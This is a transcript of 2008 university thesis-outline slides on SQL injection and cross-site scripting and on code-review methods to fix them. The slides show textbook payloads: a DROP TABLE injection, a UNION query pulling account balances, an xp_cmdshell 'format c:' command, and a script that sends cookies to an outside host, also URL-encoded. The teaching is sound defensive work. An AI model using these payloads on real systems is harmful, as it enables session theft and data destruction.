fixing sqlia and xss in the process - freie universität · pdf filewhatever it takes...
TRANSCRIPT
Whatever it takesFixing SQLIA and XSS in the process
Diploma Thesis Outline Presentation, Florian Thiel
Seminar “Beiträge zum Software Engineering”, FU Berlin, 11/06/2008
1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery
OWASP Top 10 2007
1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery
OWASP Top 10 2007
© by xckd: http://xkcd.com/327/
© by xckd: http://xkcd.com/327/
“SELECT firstname FROM Students WHERE (login = ‘%s’);” % login
© by xckd: http://xkcd.com/327/
“SELECT firstname FROM Students WHERE (login = ‘%s’);” % login
SELECT firstname FROM Students WHERE (login = ‘Robert’); DROP TABLE Students; -- ‘);
© by xckd: http://xkcd.com/327/
Confidentiality
SELECT product FROM Products WHERE productid = ‘0 UNION SELECT owner, balance FROM
Accounts; --’;
SELECT product, price FROM products WHERE categoryid = exec
master..xp_cmdshell “format c:”-- ;
New Attack Vector
Why it’s hard
Control Data
More problems
• validation context != execution context
• really tolerant DBs
• “SEL”+”ECT”, anyone?
• DBs trying to fix illegal SQL
Something different!?
http://searchsite/search?keyword=”<script>alert(‘you have been XSSed!’)</script>”
Something different!?
http://searchsite/search?keyword=”<script>alert(‘you have been XSSed!’)</script>”
“This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>. “
-- Marc Slemko, Apache.org
Got cookies?
<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
Got cookies?%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e
Common flaws
• HTML/XSS and SQL
• mix data and control
• have no well-defined execution environment
• have no “API”
Another job well done!
GET /en-us/library/aa287673(VS.71).aspx HTTP/1.1Host: msdn.microsoft.comUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.google.de/search?q=http+request+header+example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-aCache-Control: max-age=0
Hmm, are we missing something
here?
1. Make developers use a reasonable architecture
2. Make developers recognize a weakness when they meet one
3. Make developers find weaknesses
4. Make people actually fix things
Artifacts
• reviewer annotates suspicious code regions
• e.g. @userinput, @output
• makes review work visible in the source code
• and more valuable since annotations can be reused
// @userinput(data)// [insert data into query, ignore non-alphanums]def insertAlphaNum(query, data): // [make sure data is canonical] c_data = data.toCharSet(...) c_data.replace(...) ... // [insert data into query] query.prepare(...) query.insert(data...) ...
4) (Repair)
• once weakness is known, developers should be motivated enough
• focus is on keeping the code secure, minimizing effort
My tasks
• provide practical architectural assumptions
• construct effective reading method
• + awareness of potential weaknesses
• get a project to adopt my methods
This presentation is licensed under a Creative Commons BY-SA license.
Slides, materials, progress etc. can be found @ http://www.noroute.de/blog/diplomathesis
Attribution for pictures through links.